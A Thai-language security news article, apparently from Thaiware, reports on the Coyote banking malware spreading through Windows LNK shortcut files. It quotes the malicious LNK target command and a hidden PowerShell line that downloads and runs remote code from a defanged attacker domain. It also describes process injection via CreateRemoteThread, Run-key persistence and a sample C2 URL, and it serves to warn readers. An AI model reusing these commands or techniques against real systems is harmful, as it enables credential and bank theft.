มัลแวร์ดูดเงิน Coyote ใช้ประโยชน์จากไฟล์ LNK เพื่อรันสคริปท์ฝังมัลแวร์ลงเครื่อง
มัลแวร์ดูดเงิน หรือ Banking Malware นั้นเรียกได้ว่าเป็นปัญหาที่กำลังเป็นประเด็นหลักในสังคม เนื่องจากความเดือดร้อนจากมัลแวร์สามารถเห็นเป็นตัวเงินได้อย่างชัดเจน
จากรายงานโดยเว็บไซต์ Cyber Security News ได้รายงานถึงการตรวจพบแคมเปญการโจมตีของมัลแวร์ Coyote ซึ่งเป็นมัลแวร์ประเภทดูดเงินจากบัญชีธนาคาร หรือ Banking Malware ตัวหนึ่งที่มีความสามารถในการดักจับการพิมพ์ของเหยื่อ (Keylogging), แอบบันทึกหน้าจอของเหยื่อ, ไปจนถึงการปลอมหน้าเพจหรือแอปพลิเคชันธนาคาร เพื่อหลอกให้เหยื่อป้อนรหัสผ่านให้แฮกเกอร์นำไปใช้ในการขโมยเงินจากบัญชีของเหยื่อ และมัลแวร์ยังกล่าวยังมีความสามารถในการปิด Process หรือแม้แต่ปิดเครื่องของเหยื่อก็สามารถทำได้ ซึ่งปัจจุบันนั้น มัลแวร์ตัวดังกล่าวกำลังระบาดหนักในประเทศบราซิล โดยมุ่งเน้นเป้าหมายไปยังกลุ่มบรรษัทการเงินต่าง ๆ เช่น ธนาคาร เป็นต้น
ภาพจาก : https://cybersecuritynews.com/coyote-banking-malware-weaponizing-windows-lnk-files/
สำหรับการทำงานระหว่างมัลแวร์ดังกล่าวร่วมกับไฟล์ .LNK ซึ่งเป็นไฟล์ Internet Shortcut ที่ถูกนำมาใช้เป็นพาหะในการดาวน์โหลดไฟล์มัลแวร์นกต่อ (Loader) ลงมานั้น จะมีการถูกเขียนขึ้นด้วยการฝัง Argument (การกำหนด หรือรับค่าที่จะนำไปใช้งานในฟังก์ชัน) ในส่วนของ Target Path ดังนี้
cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File malicious.ps1
ซึ่งหลังจากที่รันขึ้นมาแล้ว ก็จะนำไปสู่การดาวน์โหลด และรัน PowerShell Script ที่โค้ดภายในเริ่มต้นด้วย
-w hid -noni -ep Bypass -c "Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131."
นอกจากนั้นแล้ว ยังมีการตรวจพบว่าตัวไฟล์ DLL ของมัลแวร์นกต่อ (Loader) ในขั้นตอนใดขั้นตอนหนึ่ง (แหล่งข่าวไม่ได้ระบุเจาะจงไว้) ที่มีชื่อว่า bmwiMcDec.dll ได้มีการยิง Embedded Data Segments ที่ถูกถอดรหัส (Decoded) แล้ว 2 ตัวลงไปยังหน่วยความจำ ผ่านการใช้ฟังก์ชันของ Windows API ที่มีชื่อว่า VirtualAllocEx และ WriteProcessMemory ซึ่งตัวไฟล์ DLL นั้นจะดำเนินการยิงโค้ดดังกล่าวด้วยฟังก์ชันหลักชื่อว่า CreateRemoteThread
หลังจากที่มัลแวร์ได้ติดตั้งตัวเองลงสู่เครื่องเป็นที่เรียบร้อยแล้ว ก็จะทำการเพิ่ม Registry ลงไปบนระบบ เพื่อรับประกันว่าตัวมัลแวร์จะสามารถรันบนระบบเครื่องของเหยื่อได้ทุกครั้งที่เปิดเครื่อง (Persistence) ซึ่งรูปแบบของ Registry นั้นเป็นดังนี้
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
และท้ายสุด ตัวมัลแวร์จะทำการติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ผ่านช่องทาง SSL เพื่อส่งข้อมูลต่าง ๆ เช่น ข้อมูลของตัวระบบ, ข้อมูลชื่อผู้ใช้งาน, และข้อมูลซอฟต์แวร์แอนตี้ไวรัสที่ติดตั้งอยู่บนระบบ ซึ่งข้อมูลต่าง ๆ นั้นจะผ่านการเข้ารหัสในรูปแบบ Base64 แล้วทำการเรียงข้อมูลย้อนกลับเพื่อสร้างความสับสนให้กับเครื่องมือรักษาความปลอดภัยของระบบ (Obfuscation) ซึ่งตัวอย่าง URL ของตัวเซิร์ฟเวอร์ C2 นั้นมักจะมาในรูปแบบนี้
hxxps://yezh[.]geontrigame[.]com/hqizjs/?I=y4CMuADfvJHUgATMgM3dvRmbpdFIOZ2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzImcoNEfOIDROUI
ดังนั้นเพื่อความปลอดภัย ผู้อ่านทั้งหลายต้องมีความระมัดระวังเพื่อพบไฟล์ .LNK ที่มีความผิดปกติ ผิดสังเกต เพราะการคลิกนั้น อาจนำพาไปสู่การติดมัลแวร์ได้
➤ Website : https://www.thaiware.com
➤ Facebook : https://www.facebook.com/thaiware
➤ Twitter : https://www.twitter.com/thaiware
➤ YouTube : https://www.youtube.com/thaiwaretv